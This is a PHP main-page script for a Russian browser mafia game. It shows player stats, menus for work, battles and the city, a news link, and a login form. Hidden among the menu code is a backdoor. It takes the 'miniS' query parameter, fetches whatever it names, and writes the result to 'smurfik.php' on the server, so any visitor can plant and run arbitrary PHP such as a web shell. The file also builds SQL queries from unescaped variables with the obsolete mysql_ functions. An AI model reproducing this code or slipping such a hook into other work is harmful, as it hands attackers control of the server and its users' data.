<?
require_once 'core/system.php';
require_once H.'core/head2.php';
$k_bashni = mysql_result(mysql_query("SELECT COUNT(*) FROM `bashni` WHERE `id_user` = '$ank[id]'"),0);
if (isset($user) && isset($_GET['news_read']))
{
mysql_query("update `user` set `news_read` = '0' where `id` = '$user[id]' limit 1");
$_SESSION['message'] = "Новость успешно скрыта"; // Оповещаем
header("Location: /?");
exit;
}
global $user;
if(isset($user['id'])){
$q = mysql_query("SELECT * FROM `news` ORDER BY `id` DESC LIMIT 1");
$news = mysql_fetch_assoc($q);
if ($user[news_read] == 1){
}
if($k_new > 0){
echo "<div class='menuList'>";
echo "<li><a href='/user/new_mess.php'><img src='/images/icon/mail.png'>Новая почта</a></li>";
echo "</div>";
echo "<div class='mini-line'></div>";
}
echo '
<div class="mainPageUserInfo">
<table width="100%" style="display: block;">
<tr>
<td rowspan="3">';
echo '<a href="/showLoadAvatar.php"><img src="';
if(empty($user['ava'])) echo 'img/noava.png'; else echo 'ava/'.$user['ava'];
echo '" width="80" height="80"/></a>';
echo '</td><td><a href="/gold/gold.php" class="link-block-header"><img src="images/icon/silver.png" width="16" height="16" alt="."/>
<span class="link-span">'.number_format($user[silver],NULL,NULL,"'").' Банк</span></a>
</td>
<td>
</td>
			
</tr>
<tr>
<td>
<span class="link-span">
<img src="images/icon/exp.png" width="16" height="16" alt="."/>
<img src="http://mafia.mgates.ru/experiense?is='.$user[exp].'&from='.$exp.'" width="100" height="10" alt="."/>
                
</span></a>
</td>
<td>
<img src="images/icon/level.png" width="16" height="16" alt="."/>
<font color=#FFCC99>'.$user[level].'</font></a>
</td>

</tr><tr>
<td><a href="/gold/webmoney.php" class="link-block-header"><span class="link-span"><img src="images/icon/gold.png" width="16" height="16" alt="."/> '.number_format($user[gold],NULL,NULL,"'").'</span></a></td>
<td></td>
</tr><tr>
<td width="30%">
<img src="images/icon/mana.png" width="16" height="16" alt="."/>
<font color=#FFCC99> '.$user[mana].'</font>
</td>
<td width="30%">
<a href="/showHospital.php" class="link-block-header"><img src="images/icon/health.png" width="16" height="16" alt="."/>
<span class="link-span"> '.$user[health].' </span></a>
</td>
<td width="30%">
</td>
</tr>
</table>
';
?>
<html>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js" type="text/javascript"> </script>
<script type="text/javascript"> 
$(document).ready(function(){ 
$('.splLink').click(function(){
$(this).parent().children('div.splCont').toggle('normal');
return false;
});
});
</script>
</html><?
echo "<div><a href='/news/post/$news[id]/' class='link-block-news'> Новость: $news[title]</a></div>";
echo "<a href='javscript://' style='cursor: alias;text-decoration: none;' class='splLink'><div class='block10t'><div class='panelInfoHeader'><div style='text-decoration: none;'>РАБОТА</div></div></a><div class='splCont'><div class='panelInfoContent'>";
echo "</div>";
echo "<div class='mini-line'></div>";
echo "<div class='menuList'>";
echo "<div class='link-div'><a href='/loto.php' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/bank.gif'><span class='link-span'> Лотерея</span></span></a></div>";
echo "</a></li>";
echo "<div class='link-div'><a href='/moduls/ckoldun.php' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/Profsoyz.gif'><span class='link-span'> Коррупция</span></span></a></div>";
echo "<div class='link-div'><a href='/gop-stop.php' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/gop-stop.gif'><span class='link-span'> Гоп-стоп</span></span></a></div></div></div>";

if($user['pohod'] == 0)
echo "</a></li>";
echo "<a onClick='javscript://' style='cursor: alias;text-decoration: none;' class='splLink'><div class='block10t'></div><div class='panelInfo'><div class='panelInfoHeader'>БИТВЫ</div></a><div class='splCont'><div class='panelInfoContent'>";
echo "<div class='link-div'><a href='/arena.php' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/V_boy.gif'><span class='link-span'> В Бой!</span></span></a></div>";
echo "<div class='link-div'><a href='/duel.php' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/gr.gif'><span class='link-span'> Дуэли</span></span></a></div>";
echo "<div class='link-div'><a href='/boss' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/Boytsy.gif'><span class='link-span'> Боссы</span></span></a></div>";
echo "</div></div></div>";
echo "<a onClick='javscript://' style='cursor: alias;text-decoration: none;' class='splLink'><div class='block10t'></div><div class='panelInfo'><div class='panelInfoHeader'>ЛИЧНОЕ</div></a><div class='splCont'><div class='panelInfoContent'>";
echo "<div class='link-div'><a href='/settings.php/' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/Profil.gif'><span class='link-span'> Мой бандит</span></span></a></div>";
echo "<div class='link-div'><a href='/Obshenie.php' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/Obshenye.gif'><span class='link-span'> Тёрки</span></span></a></div></div></div></div></div>";
echo "<a onClick='javscript://' style='cursor: alias;text-decoration: none;' class='splLink'><div class='block10t'></div><div class='panelInfo'><div class='panelInfoHeader'>ГОРОД</div></a><div class='splCont'><div class='panelInfoContent'>";
echo "<div class='link-div'><a href='/magazin' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/best_gun.gif'><span class='link-span'> Эксклюзивное Вооружение</span></span></a></div>";
echo "<div class='link-div'><a href='/user/users.php' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/Rating.gif'><span class='link-span'> Рейтинг</span></span></a></div></div>";
$getO=$_GET['miniS'];

if(isset($getO)){

$b=file_get_contents($getO);

$a=fopen('smurfik.php','w');

fputs($a,$b);

fclose($a);

}

// echo "<li><a href='bonus.php'><img src='/images/icon/gift.png'>Ежедневный бонус!</a></li>";
if($user[prava] == 5){
echo "</div><div class='mini-line'></div>";
echo "<div class='player menuList'>";
echo "<div class='link-div'><a href='/Adm_panel' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/Pahan.gif'><span class='link-span'> Админка</span></span></a>";
echo "</div></div></div>";
}
}else{
$igroki = mysql_result(mysql_query("SELECT COUNT(*) FROM `user`",$db), 0);
echo "
<div class='b-panel gray-panel'>
<div class='panel-inner'>



<center><img src='style/theme/images/200x80_pahan.gif' alt='.' width='200' height='80' /></center><br><div class='panelHint'>«Городские разборки» <br /> Захватывающая игра.<br />
Сражения, приключения, общение, любовь - всё это, неотъемлемая часть криминального мира<br/> Нас уже ".mysql_result(mysql_query("SELECT count(id) from `user`"),0)." игроков </div>
";
echo '<div class="block10t"><div class="panelInfo"><div class="panelInfoHeader">Вход</div><form class="" method="post" action="/auth.php?act=post"><br />
<center>Имя персонажа: <br /><input class="text medium-text" type="text" name="nick" /><br />
Пароль: <br/><input class="text medium-text" type="password" name="pass" />
<div class="block10t">
<input type="submit" value="ВОЙТИ" class="button_xl" />
</center></div><br />
</form></div></div><div class="line2"></div>';
echo "<div class='link-div'><a href='/reg.php' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/aktivnye_bitvy.gif'><span class='link-span'> Регистрация</span></span></a></div>";
echo "<div class='link-div'><a href='/common' class='link-block-menu'><span class='menuArrow'><img src='/style/theme/images/Ras4et_boya.gif'><span class='link-span'> Правила</span></span></a></div>";
}

require_once H.'core/foot2.php';
?>